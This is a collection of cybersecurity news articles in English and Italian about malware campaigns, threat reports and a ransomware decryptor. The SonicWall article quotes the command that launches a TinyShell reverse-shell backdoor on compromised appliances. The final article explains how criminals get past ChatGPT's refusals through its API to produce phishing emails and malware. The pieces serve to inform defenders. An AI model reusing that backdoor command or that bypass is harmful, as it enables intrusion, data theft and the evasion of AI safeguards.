Adobe Acrobat Sign Abused to Distribute Malware

Cybercriminals have been observed abusing Adobe’s Acrobat Sign service to deliver emails leading to a RedLine stealer infection, cybersecurity firm Avast warns.

Acrobat Sign is a cloud service that allows registered users to sign, send, and track documents in real-time, as well as to send signature requests to anyone.

When a signature request is sent, Acrobat Sign automatically generates and sends an email to the recipient, with a link to the document, which can be a PDF, Word, HTML, or another file type.

Given that the message is sent from a legitimate Adobe email address and the document for which the signature request is sent is hosted on Adobe’s servers, the message bypasses any protections that the victim might have in place.

Acrobat Sign also allows the sender to add text to that email, and cybercriminals are abusing this feature to lure unsuspecting recipients into downloading malware.

As part of the observed attack, threat actors sent signature requests for documents that contain a link to a CAPTCHA page that in turn would take the victim to the download page for a ZIP file containing the RedLine stealer.

First seen in early 2020, RedLine can harvest and exfiltrate system information, along with data typically saved in browsers, such as steal credentials, credit card data, and crypto wallet information. 

Displaying a fake notice of copyright infringement, the document analyzed by Avast was specifically created to target the owner of a popular YouTube channel. However, the intended victim realized that the document might not be legitimate and did not click the link.

A few days later, the attackers targeted the recipient again, this time with a request that also included a link to a page hosted on dochub.com, another document signing service.

If the recipient clicked on the link to review and sign the document, they were once again taken to Adobe and presented with the same document as before. A link included in the dochub.com page would take the intended victim to the same CAPTCHA page.

In addition to the RedLine stealer, the ZIP archive used in the second attack included some benign video game executables.

Likely in an attempt to bypass antivirus engines, the attackers artificially increased the size of both malware samples to over 400 megabytes.

“This abuse of Adobe Acrobat Sign to distribute malware is a new technique used by attackers that’s targeted to a specific victim. Our team has yet to detect other attacks using this technique; nevertheless, we fear that it may become a popular choice for cybercriminals in the near future. This is because it may be able to avoid different anti-malware filters, which increases its chances of reaching the victims,” Avast concludes.

Related:Microsoft OneNote Abuse for Malware Delivery Surges

Related:Attackers Can Abuse GitHub Codespaces for Malware Delivery

Related:Microsoft Patches MotW Zero-Day Exploited for Malware Delivery

Adobe Acrobat Sign Abused to Distribute Malware




Le minacce più diffuse in EMEA secondo Akamai


Akamai ha pubblicato un nuovo report della serie State of the Internet, inititolato “Attack Superhighway: un esame approfondito del traffico DNS malevolo”.

La ricerca sottolinea il crescente numero di attacchi che mirano a sottrarre informazioni personali attraverso i dispositivi mobili, come il malware Android FluBot, che si diffonde tramite SMS in lingua locale inviati all’intera lista dei contatti della vittima.

Questo tipo di attacco è risultato particolarmente efficace in alcuni paesi dell’area EMEA, come il Regno Unito, la Spagna, la Germania e la Finlandia, e ha totalizzato 193 milioni di query segnalate.

Oltre a diffondersi rapidamente, questo malware tenta di appropriarsi di informazioni personali, come i dati relativi alle carte di credito e di debito, con l’obbiettivo di sottrarre denaro o rivendere le informazioni.

Tuttavia, non solo i consumatori sono a rischio; anche le aziende sono vulnerabili a violazioni dei dati causate da malware come Emotet, Ramnit e QSnatch, che sono particolarmente diffusi nella nostra area geografica.

Alla ricerca di backdoor

Emotet, in particolare, continua a rappresentare una minaccia significativa per le organizzazioni da oltre cinque anni: si concentra sulla violazione delle reti aziendali con lo scopo di rivendere le backdoor di accesso ad altri gruppi criminali.

Una volta acquisiti i dati di accesso, questi possono essere utilizzati per assumere il controllo della rete aziendale e perpetrare attacchi di massa, in particolare di tipo ransomware o wiper. Questo malware è stato infatti collegato alle attività di grandi gruppi di ransomware come LockBit, Conti e Ryuk.

I dati raccolti da Akamai indicano che nell’area Emea Emotet è responsabile del 20% degli attacchi, il che indica un alto livello di rischio per le aziende che cercano di evitare le minacce ransomware.

Un’altra minaccia importante arriva dalla botnet nota come QSnatch, che prende di mira i dispositivi di archiviazione di rete a marchio QNAP, al cui interno sono spesso conservati dati sensibili e backup; se non vengono aggiornati e protetti diventano un obbiettivo molto appetibile. Nell’area EMEA, quasi un terzo degli attacchi è associabile a QSnatch.

L’ultima minaccia evidenziata da Akamai è Ramnit, che è responsabile un attacco su cinque nella nostra regione. Si tratta di un trojan bancario capace di sottrarre le credenziali utilizzate nell’online banking, spesso diffuso tramite phishing.

I risultati mostrati da Akamai sottolineano come l’area EMEA sia quella in cui è rilevato il maggior numero di attacchi causati da Ramnit a livello globale.

Condividi l’articolo



Articoli correlati

Altro in questa categoria


https://www.securityinfo.it/2023/03/17/le-minacce-piu-diffuse-in-emea-secondo-akamai/?utm_source=rss&utm_medium=rss&utm_campaign=le-minacce-piu-diffuse-in-emea-secondo-akamai




Malware infecting widely used security appliance survives firmware updates

Malware infecting widely used security appliance survives firmware updates

Threat actors with a connection to the Chinese government are infecting a widely used security appliance from SonicWall with malware that remains active even after the device receives firmware updates, researchers said.

SonicWall’s Secure Mobile Access 100 is a secure remote access appliance that helps organizations securely deploy remote workforces. Customers use it to grant granular access controls to remote users, provide VPN connections to organization networks, and set unique profiles for each employee. The access the SMA 100 has to customer networks makes it an attractive target for threat actors.

In 2021, the device came under attack by sophisticated hackers who exploited what was then a zero-day vulnerability. Security appliances from Fortinet and Pulse Secure have come under similar attacks in recent years.

Gaining long-term persistence inside networks

On Thursday, security firm Mandiant published a report that said threat actors with a suspected nexus to China were engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the ability of the malware to remain on the devices even after its firmware received new firmware.

“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers Daniel Lee, Stephen Eckels, and Ben Read wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”

To achieve this persistence, the malware checks for available firmware upgrades every 10 seconds. When an update becomes available, the malware copies the archived file for backup, unzips it, mounts it, and then copies the entire package of malicious files to it. The malware also adds a backdoor root user to the mounted file. Then, the malware rezips the file so it’s ready for installation.

“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers wrote.

The persistence techniques are consistent with an attack campaign in 2021 that used 16 malware families to infect Pulse Secure devices. Mandiant attributed the attacks to multiple threat groups, including those tracked as UNC2630, UNC2717, which the company said support “key Chinese government priorities.” Mandiant attributed the ongoing attacks against SonicWall SMA 100 customers to a group tracked as UNC4540.

“In recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of Internet-facing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent pattern that Mandiant expects to continue in the near term,” Mandiant researchers wrote in Thursday’s report.

Highly privileged access

The main purpose of the malware appears to be stealing cryptographically hashed passwords for all logged-in users. It also provides a web shell the threat actor can use to install new malware.

“Analysis of a compromised device revealed a collection of files that give the attacker a highly privileged and available access to the appliance,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed understanding of the appliance and is well-tailored to the system to provide stability and persistence.”

The list of malware is:

Path Hash Function
/bin/firewalld e4117b17e3d14fe64f45750be71dbaa6 Main malware process
/bin/httpsd 2d57bcb8351cf2b57c4fd2d1bb8f862e TinyShell backdoor
/etc/rc.d/rc.local 559b9ae2a578e1258e80c45a5794c071 Boot persistence for firewalld
/bin/iptabled 8dbf1effa7bc94fc0b9b4ce83dfce2e6 Redundant main malware process
/bin/geoBotnetd 619769d3d40a3c28ec83832ca521f521 Firmware backdoor script
/bin/ifconfig6 fa1bf2e427b2defffd573854c35d4919 Graceful shutdown script

The report continued:

The main malware entry point is a bash script named firewalld, which executes its primary loop once for a count of every file on the system squared: …for j in $(ls / -R) do for i in $(ls / -R) do:… The script is responsible for executing an SQL command to accomplish credential stealing and execution of the other components.

The first function in firewalld executes the TinyShell backdoor httpsd with command nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & if the httpsd process isn’t already running. This sets TinyShell to reverse-shell mode, instructing it to call out to the aforementioned IP address and port at a specific time and day represented by the -m flag, with a beacon interval defined by the -d flag. The binary embeds a hard coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It also has a listening bind shell mode available.

The researchers said they didn’t know what the initial infection vector was.

Last week, SonicWall published an advisory that urged SMA 100 users to upgrade to version 10.2.1.7 or higher. Those versions include enhancements such as File Integrity Monitoring and anomalous process identification. The patch is available here. Users should also regularly review logs for signs of compromise, including abnormal logins or internal traffic.

https://arstechnica.com/?p=1923115




Il cloud è nel mirino della criminalità informatica


CrowdStrike ha pubblicato la nuova edizione del suo Global Threat Report, che segnala un momento critico per le aziende in tutto il mondo.

Nel 2022, gli attaccanti sono diventati sempre più sofisticati, implacabili e distruttivi nei loro attacchi.

Ci sono state diverse tendenze emergenti che minacciano la produttività aziendale e la stabilità globale, il che rende imperativo che le aziende prestino attenzione a questi cambiamenti nel panorama delle minacce e rispondano con una difesa più forte e proattiva.

Gli Stati nazionali hanno giocato un ruolo di primo piano nel 2022, con la Russia che ha causato un grave rivolgimento attraverso la sua guerra di aggressione in Ucraina e minacciato l’ordine internazionale. Ciò ha messo innumerevoli organizzazioni globali a rischio di attacchi informatici.

I gruppi cinesi hanno accelerato le loro campagne di spionaggio informatico durante l’anno, mentre gli attori iraniani hanno lanciato operazioni distruttive “lock-and-leak” usando ransomware.

Nel 2022 i cyber criminali hanno continuato ad adattare e perfezionare le loro tecniche, compreso il riutilizzo delle vulnerabilità, lo sfruttamento del cloud e l’aumento degli attacchi privi di malware.

Il mercato criminale

Un’importante tendenza è stata l’aumento delle offerte da parte dei broker, che acquisiscono l’accesso alle organizzazioni e lo vendono ad altri attori, tra cui gli operatori di ransomware.

CrowdStrike Intelligence ha identificato un incremento significativo dell’attività dei broker nel 2022, con oltre 2.500 annunci identificati, un salto del 112% rispetto al 2021.

Gli attaccanti hanno utilizzato tattiche come l’abuso di credenziali compromesse acquisite tramite infostealer o acquistate sul mercato del dark web, riflettendo un crescente interesse nell’abuso delle identità.

Questa tendenza è stata confermata dal rapporto del 2022 di CrowdStrike Intelligence, che ha rilevato come l’80% degli attacchi informatici abbia sfruttato tecniche basate sulla compromissione dell’identità.

CrowdStrike Intelligence ha iniziato a tracciare 33 nuovi gruppi nel 2022, portando il numero totale monitorato a oltre 200. Fermare le violazioni richiede una comprensione di questi avversari, che includa le loro motivazioni e le tecniche usate per colpire le organizzazioni.

Le tendenze principali

Il 2022 ha visto un aumento del 95% degli attacchi che sfruttano il cloud e un triplicarsi degli incidenti che coinvolgono sistemi cloud, confermando l’evoluzione del cloud come nuovo campo di battaglia.

Gli avversari hanno continuato ad adottare nuovi metodi per eludere la protezione antivirus e superare in astuzia le difese automatiche: il 71% degli attacchi rilevati non prevedevano l’uso di malware tradizionale e si è registrato un aumento del 50% delle intrusioni interattive.

Inoltre, gli attaccanti hanno continuato a sfruttare vulnerabilità ormai ben note: Microsoft Active Directory ha presentato una porta aperta agli aggressori e l’onnipresente vulnerabilità Log4Shell ha inaugurato una nuova era di “riscoperta delle vulnerabilità”.

I gruppi collegati alla Cina sono stati osservati prendere di mira quasi tutti i settori industriali globali e le regioni geografiche, con lo scopo di raccogliere informazioni strategiche e compromettere la proprietà intellettuale con azioni mirate.

Condividi l’articolo



Articoli correlati

Altro in questa categoria


https://www.securityinfo.it/2023/03/03/il-cloud-e-nel-mirino-della-criminalita-informatica/?utm_source=rss&utm_medium=rss&utm_campaign=il-cloud-e-nel-mirino-della-criminalita-informatica




MortalKombat: Bitdefender rilascia un decryptor per il ransomware


MortalKombat ha i giorni contati: Bitdefender, nota compagnia di cybersecurity, ha rilasciato un decryptor per il ransomware appartenente alla famiglia Xorist e apparso a inizio gennaio.

Il ransomware si diffonde tramite email di phishing e colpisce istanze di desktop remoti compromesse. L’email generalmente contiene un file .zip con all’intero uno script BAT; una volta estratto, il file scarica un altro file .zip da un server controllato dagli attaccanti ed esegue il payload del malware.

Bitdefender MortalKombat

wirestock

MortalKombat colpisce diverse tipologie di file, tra le quali file di sistema, applicazioni, database, backup e macchine virtuali. Può inoltre corrompere file e cartelle relativi all’avvio di Windows e disabilitare il comando Esegui.

Per ciò che è stato osservato finora, MortalKombat cripta i dati e genera dei file con un’estensione custom che fa riferimento ai termini del riscatto. Il ransomware, inoltre, modifica lo sfondo del desktop inserendo un tema alla Mortal Kombat e genera il file “HOW TO DECRYPT FILES.txt” con le indicazioni per pagare il riscatto.

Il tool per decifrare i file cifrati da MortalKombat è scaricabile gratuitamente dal sito di Bitdefender. È possibile specificare una serie di opzioni di esecuzione, per esempio facendogli eseguire una scansione completa del sistema, disabilitare l’opzione di backup dei file o eliminare i file criptati dopo aver generato quelli decriptati. Il decryptor può essere utilizzato sia tramite interfaccia grafica che in maniera “silent” direttamente da console.

Nonostante Bitdefender abbia rilasciato una soluzione per i file criptati da MortalKombat, è importante fare attenzione alle email di phishing e ai file condivisi, e non eseguirli se non si è certi della loro provenienza.

Condividi l’articolo



Articoli correlati

Altro in questa categoria


https://www.securityinfo.it/2023/03/03/mortalkombat-bitdefender-decryptor/?utm_source=rss&utm_medium=rss&utm_campaign=mortalkombat-bitdefender-decryptor




La guerra in Ucraina ha destabilizzato la criminalità informatica


L’invasione russa dell’Ucraina ha cambiato lo scenario globale da molti punti di vista; ha causato un terremoto anche nel settore della criminalità informatica, come approfondisce un interessante report di Insikt Group.

Nonostante gli sforzi della Russia nel lanciare operazioni informatiche offensive contro l’Ucraina, fino ad ora non hanno avuto un impatto significativo sulla guerra convenzionale. Tuttavia, il rapporto suggerisce che la Russia potrebbe passare a colpire le infrastrutture civili dell’Ucraina per minare il morale delle persone.

La Russia dipende in gran parte dall’utilizzo di gruppi proxy per raggiungere i propri obiettivi in Ucraina, evidenziando la complicità dei servizi di intelligence russi (RIS) con attori non statali, come gruppi criminali informatici e hacktivisti.

Questa complicità è stata sottolineata dal rapporto Dark Covenant 2.0: Cybercrime, the Russian State, and the War in Ukraine, pubblicato alla fine di gennaio. In sintesi, la guerra ha portato alla luce la complessa relazione tra la Russia e i criminali informatici, ponendo in evidenza la necessità di una risposta globale per affrontare questa minaccia.

Rapporti a rischio

La frattura politica ha danneggiato la cosiddetta “fratellanza” tra i gruppi criminali di lingua russa nella Comunità degli Stati Indipendenti (CSI), creando un’instabilità interna che ha portato a fughe di notizie interne.

Inoltre, la “fuga di cervelli” di professionisti IT dalla Russia ha portato a una decentralizzazione geografica dei cartelli criminali informatici organizzati, rendendo le loro relazioni più diluite.

La rinascita del “crowdsourcing hacktivism” ha creato una nuova generazione di attori non statali politicamente e finanziariamente motivati; sono diventati simbolici nella percezione pubblica della “guerra cibernetica” che si svolge accanto alla guerra in Ucraina, anche se il loro impatto è stato limitato.

Il mutamento repentino dello scenario sta causando conseguenze economiche che potrebbero aumentare il valore delle frodi con carte di pagamento sul dark web, nonostante un calo generale del volume di carte nel 2022.

Questa forma di criminalità informatica sta diventando sempre meno un “crimine di opportunità” e più un “crimine di sopravvivenza”.

Gli arresti internazionali, i sequestri e le altre azioni di contrasto hanno destabilizzato il modello di business associato al crimine informatico a scopo economico, portando a effetti ad ampio raggio sui panorami delle minacce malware e ransomware-as-a-service.

Questa instabilità si è diffusa anche agli ecosistemi degli shop e marketplace sul dark web, portando a fluttuazioni dei prezzi e a una nuova concorrenza tra gli amministratori del mercato.

Il crimine informatico sta entrando in una nuova era di volatilità a seguito della guerra della Russia contro l’Ucraina, con conseguenze imprevedibili per il futuro.

Condividi l’articolo



Articoli correlati

Altro in questa categoria


https://www.securityinfo.it/2023/02/28/la-guerra-in-ucraina-ha-destabilizzato-la-criminalita-informatica/?utm_source=rss&utm_medium=rss&utm_campaign=la-guerra-in-ucraina-ha-destabilizzato-la-criminalita-informatica




New ‘Exfiltrator-22’ Post-Exploitation Framework Linked to Former LockBit Affiliates

A recently identified post-exploitation framework offered as a service appears to be operated by former affiliates of the LockBit ransomware, cybersecurity company Cyfirma reports.

Dubbed Exfiltrator-22 or EX-22, the tool was created using the leaked source code of other post-exploitation frameworks, and uses the same command-and-control (C&C) infrastructure as LockBit 3.0.

The malicious tool appears to have been created by skilled developers with knowledge of anti-analysis and defense evasion techniques, who are employing an aggressive marketing strategy, claiming that their solution is fully undetectable.

Exfiltrator-22’s operators, Cyfirma says, are likely operating from Asia and are interested in building their own affiliation program, using a subscription-based payment model: the malware is offered at $1,000 for a month, or $5,000 for lifetime access.

Customers are provided with access to a login panel for the Ex22 server, which is hosted on a bulletproof virtual private server, from where they can remotely control the malware and collect information from the infected devices, update malware configuration, deploy new versions of the tool, and create new campaigns.

“By keeping their operations centralized on a remote server, [the threat actors] can make it more difficult for security researchers to analyze and identify the source of the malware,” Cyfirma says.

Capabilities provided by Exfiltrator-22 include an elevated reverse shell, file download and upload, keylogger, file encryption (ransomware), live connection to the infected device, elevation of privilege, persistence, lateral movement, LSASS credential dumping, hashing, viewing a list of running processes, and exfiltration of authentication tokens.

The framework can bypass User Access Control (UAC), can create scheduled tasks, and allows attackers to check group memberships for the existing user and to select the payload to be executed on the target machine.

The threat actor likely completed the framework’s development in November 2022 and started advertising it on a newly created Telegram channel in early December. However, the malware developer continued to work on the tool, and has made several announcements of a new feature being added.

Cyfirma has discovered that the malware developers abuse Akamai’s content delivery network (CDN) to host Exfiltrator-22’s C&C infrastructure and believes that they likely employ an obfuscation plugin for Tor and domain fronting to hide Tor traffic in legitimate HTTPS connections.

While digging deeper into the framework, Cyfirma discovered that it uses the same domain fronting technique and C&C infrastructure as a LockBit 3.0 sample.

“It can be concluded with high confidence that the threat actors who created EX-22 are highly sophisticated threat actors that are likely to continue to increase the evasiveness of the malware. With continuous improvements and support, EX-22 becomes a go-to alternative for any threat actors planning to purchase tools for the post exploitation phase but do not want to go with the traditional tools due to high detection rates,” Cyfirma concludes.

Related: New ‘Alchimist’ Attack Framework Targets Windows, Linux, macOS

Related: Intezer Documents Powerful ‘Lightning Framework’ Linux Malware

Related:‘IceApple’ Post-Exploitation Framework Created for Long-Running Operations

https://www.securityweek.com/new-exfiltrator-22-post-exploitation-framework-linked-to-former-lockbit-affiliates/




Ukraine suffered more data-wiping malware than anywhere, ever

Destruction in Ukraine
Celestino Arce/Getty Images

Amidst the tragic toll of Russia’s brutal and catastrophic invasion of Ukraine, the effects of the Kremlin’s long-running campaign of destructive cyberattacks against its neighbor have often—rightfully—been treated as an afterthought. But after a year of war, it’s becoming clear that the cyberwar Ukraine has endured for the past year represents, by some measures, the most active digital conflict in history. Nowhere on the planet has ever been targeted with more specimens of data-destroying code in a single year.

Ahead of the one-year anniversary of Russia’s invasion, cybersecurity researchers at Slovakian cybersecurity firm ESET, network security firm Fortinet, and Google-owned incident-response firm Mandiant have all independently found that in 2022, Ukraine saw far more specimens of “wiper” malware than in any previous year of Russia’s long-running cyberwar targeting Ukraine—or, for that matter, any other year, anywhere. That doesn’t necessarily mean Ukraine has been harder hit by Russian cyberattacks than in past years; in 2017 Russia’s military intelligence hackers known as Sandworm released the massively destructive NotPetya worm. But the growing volume of destructive code hints at a new kind of cyberwar that has accompanied Russia’s physical invasion of Ukraine, with a pace and diversity of cyberattacks that’s unprecedented.

“In terms of the sheer number of distinct wiper malware samples,” says ESET senior malware researcher Anton Cherepanov, “this is the most intense use of wipers in all computer history.”

Researchers say they’re seeing Russia’s state-sponsored hackers throw an unprecedented variety of data-destroying malware at Ukraine in a kind of Cambrian Explosion of wipers. They’ve found wiper malware samples there that target not just Windows machines, but Linux devices and even less common operating systems like Solaris and FreeBSD. They’ve seen specimens written in a broad array of different programming languages, and with different techniques to destroy target machines’ code, from corrupting the partition tables used to organize databases to repurposing Microsoft’s SDelete command line tool, to overwriting files wholesale with junk data.

In total, Fortinet counted 16 different “families” of wiper malware in Ukraine over the past 12 months, compared to just one or two in previous years, even at the height of Russia’s cyberwar prior to its full-scale invasion. “We’re not talking about, like, doubling or tripling,” says Derek Manky, the head of Fortinet’s threat intelligence team. “It’s an explosion, another order of magnitude.” That variety, researchers say, may be a sign of the sheer number of malware developers whom Russia has assigned to target Ukraine, or of Russia’s efforts to build new variants that can stay ahead of Ukraine’s detection tools, particularly as Ukraine has hardened its cybersecurity defenses.

Fortinet has also found that the growing volume of wiper malware specimens hitting Ukraine may in fact be creating a more global proliferation problem. As those malware samples have shown up on the malware repository VirusTotal or even the open source code repository Github, Fortinet researchers say its network security tools have detected other hackers reusing those wipers against targets in 25 countries around the world. “Once that payload is developed, anyone can pick it up and use it,” Manky says.

https://arstechnica.com/?p=1919531




I malware più diffusi di gennaio secondo Check Point


 Il Global Threat Impact Index di gennaio 2023 di Check Point ha evidenziato il ritorno di Vidar nella top ten dei malware più diffusi a livello globale (al settimo posto), a causa dell’aumento delle istanze di brandjacking, e il lancio di una grande campagna malware njRAT in Medio Oriente e Nord Africa.

Vidar si è diffuso attraverso domini falsi che si presentano come affiliati alla società di software desktop remoto AnyDesk; una volta scaricato, il malware si è mascherato da programma di installazione legittimo per rubare informazioni sensibili come credenziali di accesso, password, dati del wallet di criptovaluta e credenziali bancarie.

La campagna Earth Bogle tenta di diffondere il malware njRAT a obiettivi in Medio Oriente e Nord Africa attraverso email di phishing con temi geopolitici, invitando gli utenti ad aprire allegati dannosi.

Una volta scaricato e aperto, il trojan può infettare i dispositivi e consentire agli aggressori di rubare informazioni sensibili. njRAT è sceso alla decima posizione nella lista dei malware, dopo essere stato nella top ten a settembre 2022.

I primi della classe

Qbot e Lokibot sono i malware più diffusi a livello globale, con un impatto di oltre il 6% rispettivamente sulle organizzazioni mondiali, seguiti da AgentTesla con un impatto globale del 5%.

Qbot è un trojan bancario apparso per la prima volta nel 2008 e progettato per rubare le credenziali e le sequenze di tasti dell’utente, spesso distribuito tramite email di spam.

Lokibot è invece un infostealer con versioni per i sistemi operativi Windows e Android, in grado di raccogliere credenziali da diverse applicazioni.

AgentTesla, infine, è un RAT avanzato che funziona come keylogger e infostealer, in grado di monitorare e raccogliere l’input della tastiera della vittima e le credenziali di diversi software installati sulla macchina di una vittima, tra cui Google Chrome, Mozilla Firefox e il client di posta elettronica Microsoft Outlook.

Malware mobile

Per quanto riguarda i malware mobile, le rilevazioni hanno visto prevalere Anubis, un trojan bancario per Android che continua ad acquisire nuove funzioni, tra cui RAT, keylogger e ransomware.

In seconda posizione si trova Hiddad, malware che modifica app legittime per visualizzare annunci e accedere ai dettagli di sicurezza del sistema operativo.

AhMyth è al terzo posto, un trojan RAT che può essere distribuito attraverso app infette che raccolgono informazioni sensibili dal dispositivo e possono attivare la fotocamera, acquisire schermate e inviare messaggi SMS.

Passando ad analizzare i settori preferiti dalla criminalità informatica, l’istruzione e ricerca è rimasta l’industria più attaccata a livello globale, seguita da governo e militare e poi dalla sanità.

La vulnerabilità più sfruttata è stata Web Server Exposed Git Repository Information Disclosure, che ha colpito il 46% delle organizzazioni a livello globale, seguita da HTTP Headers Remote Code Execution con il 42%. Terza in classifica è MVPower DVR Remote Code Execution, con un impatto globale del 39%.

La prima vulnerabilità è legata all’intercettazione di informazioni personali nei repository Git, la seconda alle intestazioni utilizzate per passare informazioni aggiuntive con una richiesta Http e la terza all’esecuzione di codice remoto nei dispositivi MVPower DVR.

Condividi l’articolo



Articoli correlati

Altro in questa categoria


https://www.securityinfo.it/2023/02/22/i-malware-piu-diffusi-di-gennaio-secondo-check-point/?utm_source=rss&utm_medium=rss&utm_campaign=i-malware-piu-diffusi-di-gennaio-secondo-check-point




Hackers are selling a service that bypasses ChatGPT restrictions on malware

Illustration of a chat bot on a computer screen.
Getty Images | Carol Yepes

Hackers have devised a way to bypass ChatGPT’s restrictions and are using it to sell services that allow people to create malware and phishing emails, researchers said on Wednesday.

ChatGPT is a chatbot that uses artificial intelligence to answer questions and perform tasks in a way that mimics human output. People can use it to create documents, write basic computer code, and do other things. The service actively blocks requests to generate potentially illegal content. Ask the service to write code for stealing data from a hacked device or craft a phishing email, and the service will refuse and instead reply that such content is “illegal, unethical, and harmful.”

Opening Pandora’s Box

Hackers have found a simple way to bypass those restrictions and are using it to sell illicit services in an underground crime forum, researchers from security firm Check Point Research reported. The technique works by using the ChatGPT application programming interface rather than the web-based interface. ChatGPT makes the API available to developers so they can integrate the AI bot into their applications. It turns out the API version doesn’t enforce restrictions on malicious content.

“The current version of OpenAI’s API is used by external applications (for example, the integration of OpenAI’s GPT-3 model to Telegram channels) and has very few if any anti-abuse measures in place,” the researchers wrote. “As a result, it allows malicious content creation, such as phishing emails and malware code, without the limitations or barriers that ChatGPT has set on their user interface.”

A user in one forum is now selling a service that combines the API and the Telegram messaging app. The first 20 queries are free. From then on users are charged $5.50 for every 100 queries.

An ad for a Telegram bot that can use ChatGPT to generate malicious content.
Enlarge / An ad for a Telegram bot that can use ChatGPT to generate malicious content.
Check Point Research

Check Point researchers tested the bypass to see how well it worked. The result: a phishing email and a script that steals PDF documents from an infected computer and sends them to an attacker through FTP.

A phish generated with the Telegram bot.
Enlarge / A phish generated with the Telegram bot.
Check Point Research
Malware generated with the Telegram bot.
Enlarge / Malware generated with the Telegram bot.

Other forum participants, meanwhile, are posting code that generates malicious content for free. “Here’s a little bash script to help you bypass the restrictions of ChatGPT in order to use it for whatever you want, including malware development ;),” one user wrote.

A bash script for bypassing ChatGPT restrictions.
Enlarge / A bash script for bypassing ChatGPT restrictions.
Check Point Research

Last month, Check Point researchers documented how ChatGPT could be used to write malware and phishing messages.

“During December – January, it was still easy to use the ChatGPT web user interface to generate malware and phishing emails (mostly just basic iteration was enough), and based on the chatter of cybercriminals we assume that most of the examples we showed were created using the web UI,” Check Point researcher Sergey Shykevich wrote in an email. “Lately, it looks like the anti-abuse mechanisms at ChatGPT were significantly improved, so now cybercriminals switched to its API which has much less restrictions.”

Representatives of OpenAI, the San Francisco-based company that develops ChatGPT, didn’t immediately respond to an email asking if the company is aware of the research findings or had plans to modify the API interface. This post will be updated if we receive a response.

The generation of malware and phishing emails is only one way that ChatGPT is opening a Pandora’s box that could bombard the world with harmful content. Other examples of unsafe or unethical uses are the invasion of privacy and the generation of misinformation or school assignments. Of course, the same ability to generate harmful, unethical, or illicit content can be used by defenders to develop ways to detect and block it, but it’s unclear whether the benign uses will be able to keep pace with the malicious ones.

https://arstechnica.com/?p=1916125